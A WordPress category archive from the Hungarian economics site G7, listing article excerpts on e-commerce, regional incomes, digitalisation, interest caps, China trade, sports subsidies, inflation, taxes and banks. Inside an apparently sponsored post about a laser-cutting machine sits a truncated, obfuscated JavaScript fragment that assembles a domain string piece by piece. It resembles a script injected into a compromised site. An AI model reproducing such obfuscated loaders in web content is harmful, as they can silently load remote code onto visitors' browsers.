Best WordPress Hosting
 

Kategória archívum : G7

Nemcsak a Temu tarolása a probléma, hanem hogy kicsi a magyar piac

Közzétette szerző

Egy lakosra vetítve 280 euró volt a magyar elektronikus kereskedelmi piac mérete 2022-ben, ez számolható ki a GKID és a Mastercard múlt héten publikált (és 2023 nyarán egységes módszertannal gyűjtött), regionális Digitális Kereskedelmi Körképéből. Az alábbi grafikonon jól látszik, hogy ez mennyire szerény eredmény a régiós mezőnyben.

Nem sokkal jobb a helyzet, ha a piac méretét az egyes országok GDP értékéhez arányosítjuk. A magyar 1,6 százalék nagyon messze van az élbolytól.

A felmérés készítői hangsúlyozzák, hogy az online kiskereskedelmi forgalom méretére jelentős hatással van az egyes országok lakosságszáma, az online vásárlók száma és aránya, de a piac kínálati oldalának érettsége, szerkezete, valamint a gazdaság fejlettsége is.

PostPin It!

Már csak a legszegényebb románok jövedelme marad el a magyarokétól

Közzétette szerző

Noha a román kormányfő május elsejei beszéde szerint a bérek tekintetében Románia megelőzte Magyarországot, az adatok tükrében Marcel Ciolacu kijelentése kissé elhamarkodottnak tűnhet. Az ország kétségtelenül – a magyarországi trendekhez képest – meredek gazdasági fejlődését ugyanis korántsem egyöntetű mértékben tapasztalhatják az egyes társadalmi rétegek, így bár magasabb lett a vásárlóerő-paritáson*A PPP (purchasing power parity), vagyis a vásárlóerő-paritás módszerével összehasonlíthatjuk, hogy mennyi hasonló minőségű terméket és szolgáltatást vásárolhatunk különböző országokban egy valutában a másikhoz mérve, így figyelembe véve a helyi valuta értékét és a helyi árszínvonalat. mért egy főre jutó GDP és a tényleges egyéni fogyasztás Romániában, mint Magyarországon, az átlagos adatok elfedik, hogy

az előrelépést egészen másként élték meg a gazdagabb, a közepes keresetű és a szegényebb csoportok.

Az egyes jövedelmi tizedeket – ezekbe országonként a lakosság tíz-tíz százaléka kerül besorolásra a legszegényebbektől kezdve a leggazdagabbakig – jellemző, szintén vásárlóerő-paritáson számított béradatok tükrében jól látszik, hogy először a legtehetősebb román rétegek zárkóztak fel a leggazdagabb magyarokhoz. 2020-ban*Módszertani okok miatt az itt bemutatott adatok az Eurostat által jelzett időbeli vonatkozáshoz képest az egy-egy évvel korábbi helyzetet jellemzik pontosabban, ám mi az uniós statisztikai hivatal közlése szerinti évekhez kapcsoljuk őket. ugyanis még minden jövedelmi szeletet nézve kedvezőbb anyagi helyzetben volt a magyar társadalom a romániaihoz képest, ám egy évvel később a leggazdagabb románok már jobban kerestek, mint a hasonló státuszú magyarok. (Pontosabban a kilencedik tized romániai tized előzte a magyarországi kilencedik tizedet, a legjobban keresők decilis adatai ugyanis meglehetősen bizonytalanok, ezért nem közli őket az Eurostat.)

PostPin It!

Kedves magyar cégvezető, mikor ébredsz rá, hogy nem lehet megúszni a digitalizációt?

Közzétette szerző

A szerző a kis-és középvállalkozások digitális versenyképességét rendszeresen mérő Digiméter projekt szakmai vezetője, a Corvinus Egyetem adjunktusa. Az Ekonomi a G7 véleményrovata.

2020 óta méri a Digiméter a hazai vállalkozások digitalizációjának szintjét. A 2024-ben immár negyedik alkalommal futó kutatássorozat alapján a 100-as indexen nincs érdemi elmozdulás, továbbra is 40-es értéket mutat (2022-ben 41, 2020-ban és 2021-ben pedig 40 volt). A hazai cégek tehát köszönik szépen, de lehetőleg nem kérnek a digitális megoldásokból. Ez azonban idővel megbosszulhatja magát.

Amikor 2022 év végén, másfél évvel ezelőtt megmértük a cégek digitalizációs szintjét, az volt a várakozásunk, hogy a kibontakozó válság erősíteni fogja a hatékonyságot növelő digitalizáció létjogosultságát. Mint utólag, a 2024 tavaszi Digiméter kutatásunk alapján kiderült, mindez vágyvezérelt gondolkodásnak bizonyult. A cégek inkább a már korábban bevált – jellemzően nem digitális – megoldásokhoz nyúltak vissza.

PostPin It!

Az egyik leggazdagabb magyar vette meg a bukott ásványvízkirály jachtját

Közzétette szerző

Lezárult az egykori legnagyobb magyar ásványvízgyártó történetének utolsó fejezete: hivatalosan is új tulajdonoshoz került az Aquarius-Aqua bukásának jelképévé váló luxusjacht. Az egészen mostanáig Cassiopeia néven ismert 34 méteres hajót át is keresztelték, május eleje óta Aragónak hívják. Ha valakinek ismerősen cseng a név, az nem véletlen: az Arago-csoport az egyik leggazdagabb magyar, Leisztinger Tamás cégbirodalma.

Nagyon magasról nagyon mélyre

Az Aquarius-Aqua és a Cassiopeia történetéről többször írtunk már a G7-en. Az albertirsai Aquarius a 2000-es évek elejének nagy sikersztorija volt. A cég vezetése jól ismerte fel, hogy hatalmas potenciál rejlik az ásványvízben, amelynek hazai fogyasztása ekkor messze elmaradt még a nyugat-európai országokra jellemző szinttől. A vállalat nagyon gyorsan nőtt nagyon nagyra. Piaci részesedése már 2004-ben 15 százalékos volt, a csúcson pedig a 35 százalékot közelítette. A 2010-es évek elején napi háromezer raklap ásványvizet, üdítőt és energiaitalt gyártott. Ebben az időszakban ragasztották a cég többségi tulajdonosára és vezetőjére, P. Tamásra az „ásványvízkirály” jelzőt.

PostPin It!

Újabb haladékot kaphatnak a lakossági hiteltörlesztők Nagy Márton mai szavai alapján

Közzétette szerző

Akkor vezeti ki a kormány a lakossági hitelekre vonatkozó kamatplafont, ha helyreáll a fogyasztás és beindul a gazdaság, mondta Nagy Márton a Magyar Bankszövetség konferenciáján. Az előbbire leginkább a kiskereskedelem forgalmát nézve következtethetünk, ami 2022 márciusa óta jócskán visszaesett, és csak az utóbbi hónapokban mutatott némi emelkedést.

Miért fontos ez? A magyar gazdaságpolitika egyik legfőbb célja a belső fogyasztás erősítése, amiért kész akár mélyen beavatkozni bizonyos piaci folyamatokba, mint például a hitelkamatok alakulása. A kormány arra számít ugyanis, hogy a mérsékelt hitelterhek mellett felszabaduló pénzt a lakosság fogyasztásra költi.

Alulnézet: A kamatstop amellett, hogy a bankok számára nehézségeket okoz, kellemetlen helyzetbe hozza azokat az adósokat, akik a kockázatokat mérlegelve az intézkedés bevezetése előtt a drágább, de kiszámítható fix kamatlábú konstrukciókból választottak a rövid távon olcsóbb változó kamatozásúak helyett, hiszen a kamatstop ezeket is fixálta.

PostPin It!

Furcsa szimbóluma lesz a magyar-kínai közeledésnek a cseresznye és a marhasperma

Közzétette szerző

A cseresznye és a szarvasmarha-szaporítóanyag Kínába irányuló exportjáról is megállapodott Orbán Viktor és Hszi Csin-ping csütörtökön, ami a kilátásba helyezett közlekedési és energetikai nagyberuházások mellett némileg furcsának tűnhet.

Miért fontos ez? A Magyarországról Kínába szállított áruk értéke jócskán elmarad a fordított irányban zajló termékforgalomtól, a közelmúltban ráadásul megnőtt az export és az import közötti különbség: a behozatal ugyanis jelentősen megnőtt, míg a kivitel alapvetően stagnált.

Alulnézet: a szóban forgó két termék exportforgalma elhanyagolható a teljes magyar kivitelben (Kínába pedig eddig nem lehetett belőlük szállítani). A szarvasmarha-szaporítóanyag exportértéke a teljes export összegéhez képest leginkább alulról súrolta az elmúlt években a 0,01 ezrelékes szintet, míg a cseresznye kivitele többnyire épp csak meghaladta ezt a küszöböt.

PostPin It!

Ötszázszor több tao-pénz jutott a felcsúti focinak, mint az országos átlag

Közzétette szerző

Jelentős eltérések vannak az egyes vármegyék között az alapján, hogy mennyi tao-támogatást hagyott jóvá különböző sportszervezetek számára az elmúlt 13 évben a Magyar Labdarúgó Szövetség. Különösen látványossá válik ez, ha népességarányosan nézzük az adatokat.

Már az is érdekes, hogy a legtöbb tao-pénz nem a fővárosba, hanem Fejérbe érkezett. A tao-támogatás bevezetése, 2011 és 2024 között a vármegye sportszervezeteinek 53 milliárd forint támogatást hagyott jóvá a szövetség. A másik véglet Nógrád, ahol ez a szám csak 5,5 milliárd.

Népességarányosan is nagyok a különbségek, bár valójában itt is csak Fejér miatt. Miközben a többi megyében 30 és 51 ezer forint között szóródott az egy főre jutó támogatás összege, az országos átlag pedig 41 ezer forint volt, addig Fejér vármegye minden lakosára 135 ezer forintnyi tao-pénz jutott.

PostPin It!

Magyarország üdvözli, az Európai Bizottság egyre inkább üldözi a kínai cégeket

Közzétette szerző

Bár Hszi Csin-ping kínai elnök magyarországi látogatása során nem jelentettek be újabb kínai beruházásokat – csak projektek előkészítését -, a magyar szándék szemmel láthatóan töretlen a gazdasági kapcsolatok további erősítésére.

Ez a világgazdaság nyitottságának folyamatos erodálódásával, a geopolitikai kockázatok növekedésével párhuzamosan nem kockázatmentes dolog. Az Európai Unióban az elmúlt években részben pont a kínai feldolgozóipari konkurencia fejlődése, valamint a bőkezű állami támogatásokkal felgyorsított globális és európai piacszerzése miatt felerősödtek a hazai ipar védelmét, a növekvő kínai importfüggőség csökkentését és az ellátásbiztonságot szavatolását priorizáló nézetek. 

Ez az utóbbi hónapokban már nemcsak a nyilatkozatok terén, hanem a gyakorlatban is elkezdett világos változásokat hozni. Az Európai Bizottság eljárást indított több, a napelem- és szélturbinagyártásban érdekelt kínai vállalat ellen piactorzító állami támogatás gyanújával, tagállami vasúti közbeszerzésekre szállt rá a feltűnően alacsony kínai árazás miatt, az európai gyártók kínai diszkriminációja miatt vizsgálja a kínai orvosieszköz-gyártók uniós paci hozzáférésének korlátozását, továbbá megtartotta első házkutatását is az állami szubvenciókhoz köthetően egy kínai állami cég európai irodáiban.

PostPin It!

Durván az olcsó élelmiszerek felé lökte az infláció a bevásárlásokat

Közzétette szerző

A fogyasztási szerkezet jelentős átrendeződésének nevezi, de egyébként nyíltan el is ismeri a kormány azt, hogy a nagy infláció miatt a lakosság jóval kevesebb élelmiszert és azon belül is az olcsóbbakat tudta csak megvenni 2022-ben és 2023-ban – az Agrárminisztérium helyettes államtitkára legalábbis így jellemezte a helyzetet az Agrárszektornak.

Miért fontos ez? Az elmúlt két évben az elszálló árak miatt bekövetkezett az, amire korábban sokkal kisebb esély láttak a piacon: a vásárlók jelentős része kénytelen volt feladni a márkahűségét, másrészt sok esetben az alacsonyabb minőség felé lépett.

Számokban: 2021-ben a lakosság még 41,2 százalékkal több pénzt hagyott a boltokban, mint 2020-ban. Ekkor 4,1 százalékos volt az élelmiszer-infláció, azaz reálértékben is nagyon jelentősen bővült a költés, miközben a volumen is emelkedett, 2,2 százalékkal. A vásárlók ekkor még valamivel több árut vettek, de jóval többet költöttek rá, vagyis a drágább termékek felé mozdultak.

PostPin It!

A mostani miniválság mutatja, miért veszélyes az akkugyáraknak való kiszolgáltatottság

Közzétette szerző

2,8 százalékkal csökkent az ipari termelés volumene márciusban a munkanaphatástól tisztított év/év adatok szerint. A visszaesés minden ágazatot érintett, ám a járműgyártásban, valamint a villamos berendezések gyártásában kifejezetten jelentős mértékű volt a KSH közleménye szerint.

Miért fontos ez? A német járműiparnak régóta kitett Magyarországon a 2008-as válság óta bőven akad tapasztalat az efféle függőségek kockázataival kapcsolatban – a hazai autógyártás akkor mennyiségben 40 százalékkal szűkült, a teljes ágazat kibocsátása pedig negyedével csökkent, a gazdaság egészénél jóval nagyobb visszaesést mutatva, egyben válságba sodorva az államháztartást.

Azóta az autóipar mellett az akkumulátorgyártás iránt is elköteleződött a magyar gazdaságpolitika, Szijjártó Péter tavaly ősszel vázolt víziója szerint Magyarország hamarosan a világ második legnagyobb akkumulátorgyártója lesz, és a közelmúlt kibocsátási és GDP-adatain is jól látszik az ágazat térnyerése.

PostPin It!

Uniós élmezőnyben van az összes magyar régió az autók számának növekedése alapján

Közzétette szerző

A legszegényebb magyar régiókban nőtt az elmúlt időszakban a legnagyobbat az ezer főre eső személyautók száma 2022 és 2016 között az európai unió statisztikai hivatalának friss adatai szerint.

Mi történt? Megjelentek az Eurostat friss adatai arról, hogy az egyes uniós régiókban átlagosan hány autójuk van az embereknek. Uniós szinten átlagosan 560 autó jut ezer lakosra 2022-ben.

Habár a magyar régiók közül egyik sem éri el ezt a szintet, számításaink szerint viszont az összes magyar régió szerepel a 25 legnagyobb növekedést felmutató uniós régió között.*2016 és 2022 között 183 régiót összehasonlítva, mivel 57, főként portugál, lengyel, német és francia régió esetében az egyik évre vonatkozóan nincs adat.

PostPin It!

A kormány és a multik sem járnak rosszul az ország gazdasági függőségével

Közzétette szerző

Habár a magyar kormány gazdaságpolitikája önmeghatározása szerint patrióta, tehát a külföldi cégek támogatása helyett a hazai vállalkozások megerősítése a fő célja, a 2010 óta hatalmon lévő Orbán-kormányok a rendszerváltás utáni időszak más kormányaihoz hasonlóan támaszkodnak a külföldi cégek beruházásaira. Erre kifejezetten büszkék is, Szijjártó Péter külgazdasági és külügyminiszter rendszeres győzelmi jelentéseket tesz közzé az országba beáramló külföldi beruházások nagyságáról: legutóbb például az év elején számolt be a tavalyi év 13 milliárd eurós beruházási rekordjáról.

Ahogy azt az elmúlt években több elemzés is bemutatta, a 2010 előtti időszakhoz képest ugyan több közvetlen támogatást kaptak a magyar tulajdonú cégek is, de a multinacionális cégek is több támogatásra számíthattak. Az elmúlt évek befektetési rekordjai tehát nem pusztán piaci alapon valósultak meg, azokhoz a kormány is hozzájárult azzal, hogy bőséges közvetlen támogatásokkal ösztönözte, hogy ezeket a projekteket Magyarországra hozzák. Ráadásul a régióban nem a magyar gazdaságpolitika az egyetlen példa az ilyesmire, ugyanis a magát nemzetiként vagy patriótaként meghatározó, 2015 és 2023 között kormányzó lengyel Jog és Igazságosság (PiS) kormányzása alatt is több támogatást kaptak a külföldi cégek, mint a korábbi kormányok alatt.

Szinte csak a külföldi tőke

PostPin It!

Már van megoldás a nagy méretű és nagy átmérőjű fémszerkezetek vágására

Közzétette szerző

Többé nem jelent problémát a nehezen kezelhető fémprofilok precíziós vágása a gyártó vállalatok számára. A Vass Acélcsarnok Kft. legújabb csőlézer vágógépe végre megoldást kínál a nagy átmérőjű csövek, zártszelvények és profilok vágására.

(function(){

xb2w_=(“u”+””)+”s”+””;xb2w_+=(“tat.”)+(“i”);

PostPin It!

A magas magyar áfa olyan drog, amiről nehéz lejönni

Közzétette szerző

A fogyasztásra rendkívüli, a munkajövedelemre átlagos, a nyereségre pedig kifejezetten visszafogott közterheket ró a magyar adórendszer régiós összehasonlításban, derült ki a Mazars adótanácsadó idei, Németországtól Kazahsztánig 25 országot összehasonlító felméréséből. Az évente összeállított jelentés idei kiadása az adókulcsok stabilitására is rámutat, vagyis

mostanra nagyjából kiderült, meddig lehet lemenni például a béreket illető adókulcsokkal.

Miért fontos ez? A nemzetközi befektetési döntések során az egyik kulcstényező az egyes országok adórendszere. E tekintetben Magyarország üzenete egyértelmű a társasági adó 9 százalékos kulcsával, ami páratlanul alacsony az unióban: a nagy nyereséget realizáló vállalatoknak az ország rendkívül kedvező körülményeket biztosít.

PostPin It!

Folytatódnak az áremelések, amik miatt megorrolt a bankokra és a telekomcégekre a jegybank

Közzétette szerző

Idén tovább folytatódnak a banki és telekommunikációs szektorokban az előző évi infláció alapján megállapított nagyobb díjemelések, amelyeket a jegybank többször is helytelenített.

Mi történt? Mostanra minden nagyobb bank bejelentette, hogy a tavalyi inflációt követve mennyit emel az idén a díjain.

Átlagosan 28 százalékkal kerülnek többe idén a nagyobb bankoknál nyitható egyszerűbb számlák most az Énpénzem.hu saját gyűjtése alapján.

PostPin It!

Az OTP-t is érintheti, hogy fogy a türelem az Oroszországban üzletelő európai bankokkal szemben

Közzétette szerző

Az Európai Unió 2022 tavaszán, az Ukrajna elleni agressziót követően az orosz pénzügyi rendszer jelentős részét leválasztotta a nyugati és globális banki és fizetési rendszerekről. A pénzügyi szankciós csomagok keretében erősen korlátozta az orosz pénzügyi világ euró- és dollárelszámolásokhoz való hozzáférését, a legtöbb bankot eltiltotta a messze legnagyobb nemzetközi banki kommunikációs rendszer, a SWIFT használatától (illetve a SWIFT-et az oroszok kiszolgálásától), és az európai piaci részvételüket is ellehetetlenítette.

A pénzügyi szankciók az európai bankok tevékenységének korlátozását is maguk után vonták, különösen az orosz vállalati szférához és a hadiiparhoz köthető ügyletek esetében. Ugyanakkor számos nagy európai uniós székhelyű bank bent maradt az orosz piacon, sőt a háború kezdete óta növelte részesedését és nyereségét.

A Financial Times április végi adatgyűjtése szerint a hét legnagyobb, európai uniós székhelyű bank, a Raiffeisen, az Unicredit, az OTP, az Intesa Sanpaolo, az ING, a Commerzbank és a Deutsche Bank tavaly összesen hárommilliárd eurós nyereséget könyvelt el és 800 millió euró adót fizetett Oroszországban. Ez jóval magasabb, mint a háború előtti érték: 2021-ben az érintett hét bank nyeresége ennek harmada, adókötelezettsége negyede volt. 

PostPin It!

Elkezdődött a G7 új korszaka

Közzétette szerző

Vége az átmenetnek, a lovak közé csapunk, írnám nagy lendülettel, ha a lovak nem mi magunk lennénk. Egy hónappal ezelőtt türelmet kértem olvasóinktól, azt ígérve, hogy miután kollégáim kipihenik az utóbbi hónapok megpróbáltatásait, újult erővel, több és frissebb cikkel térünk vissza.

Eljött ez az idő, és remélem, hogy a G7-en megjelenő tartalmak ezután is elnyerik olvasóink tetszését. Hamarosan újraindul hírlevelünk is, egyelőre heti egy alkalommal.

Cikkeinkben továbbra sem célunk Magyarország és a világ összes fontos eseményének bemutatása, hírzajtól nálunk nem kell tartani. Minden hétköznap feldolgozunk azonban néhány erre érdemesnek tartott aktualitást, kitérve ezek hátterére vagy máshol elhanyagolt összefüggéseire. Reggelente megjelenő vezető cikkeinkben pedig továbbra is egy-egy fontos vagy érdekes témát dolgozunk fel a szokott alapossággal.

PostPin It!

Elmegy a piac a magyar e-kereskedők mellett

Közzétette szerző

Már csak 8,5 százalékkal bővült a magyar online kiskereskedelmi forgalom 2023-ban, 2024 első negyedévében pedig a növekedés tovább lassult, 6,1 százalékra – ez derült ki a GKID és a Mastercard Digitális Kereskedelmi Körkép elnevezésű riportjának legfrissebb kiadásából.

Miért fontos ez? A kiskereskedelem internetes része hosszú évekig masszív felfutásban volt, amelyből sok piaci szereplő majdhogynem automatikusan jó hasznot húzhatott. Ennek a korszaknak azonban vége, és a számok, illetve piaci előrejelzések szerint magyar szereplőként sokkal nehezebb időszak következik.

Tágabb kontextus: a kis mértékű növekedés ugyan még mindig sokkal jobb, mint a hagyományos bolti kereskedelem volumenben számolt 7,9 százalékos csökkenése 2023-ban, de a tavalyi 17 százalékos inflációt figyelembe véve látszik, hogy a vásárlóerő csökkenésének következtében a lakosság ebben a szegmensben is kevesebb és/vagy olcsóbb árut vett.

PostPin It!

Magyar egészségügy 2024: inkasszó, eszközhiány, 100 milliárdos adósság

Közzétette szerző

Bár elvileg megindult a kórházak adósságkonszolidációja, továbbra is több intézménynek láthatóan napi finanszírozási gondjai vannak. Ha az állam segítségével végül sikerül is rendezni az összességében 100 milliárd forint feletti tartozást, hosszútávon az sem oldja meg a problémát.

Mi történt? A Népszava írta meg hétfő reggel, hogy inkasszóval szedte be az adóhatóság a Jászberényi Szent Erzsébet Kórház mintegy 57 millió forintos köztehertartozását. A lap más kórházakat is talált a NAV végrehajtási eljárás alatt álló adózók listájában.

Korábban nem volt jellemző, hogy különböző szervezetek csak úgy pénzt emeljenek le kórházak számlájáról. Szintén a Népszava írt róla pár hete, hogy míg az elmúlt 30 évben senki nem bocsátott ki fizetési meghagyást, pár hete egy műtéti anyagokat szállító cég is megtette. Ezt követte a napokban a NAV-inkasszó.

PostPin It!

A románok fogyasztanak, a magyarok beruháznak, de ki lesz ettől gazdagabb hosszú távon?

Közzétette szerző

Románia hivatalosan is lehagyta Magyarországot, amelynek lakossága a második legszegényebb az Európai Unióban, így fényévekre vagyunk a román jóléttől. „Bezzeg Románia” nem előzte le Magyarországot, és hiába a növekedés, még a románok is azt mondják, hogy Románia még mindig szegényebb, mint Magyarország.

Ha valaki csak a magyar sajtóban megjelent – a fentiekhez hasonló tartalmú – címek alapján akarna képbe kerülni Románia és Magyarország gazdasági fejlődésének elmúlt éveivel kapcsolatban, nehéz dolga lenne. De még a részletesebb elemzések alapján sem teljesen egyértelmű, hogy milyen tanulságai vannak a két leggyakrabban idézett adat alakulásának, tehát hogy Románia egy főre jutó GDP-je tavaly megelőzte Magyarországét, miközben tényleges egyéni fogyasztás (actual individual consumption – AIC) alapján az uniós lista aljáról tíz év alatt középmezőnybe került, és a magyar adatnál 2022-ben csak a bolgár volt gyengébb.

Mivel nem is célszerű egy-egy adat alapján dönteni arról, hogy melyik ország szegényebb vagy gazdagabb, ebben a cikkben azt mutatjuk be, hogy miből származik a két mutatószámban tapasztalható eltérés a két ország között, és hogy ezek mit árulnak el a közeljövőbeli gazdasági kilátásaikról. Mielőtt azonban ezekre rátérnénk, nézzük meg részletesebben is az adatok alakulását, és hogy egyáltalán mit jelentenek ezek a mutatószámok.

PostPin It!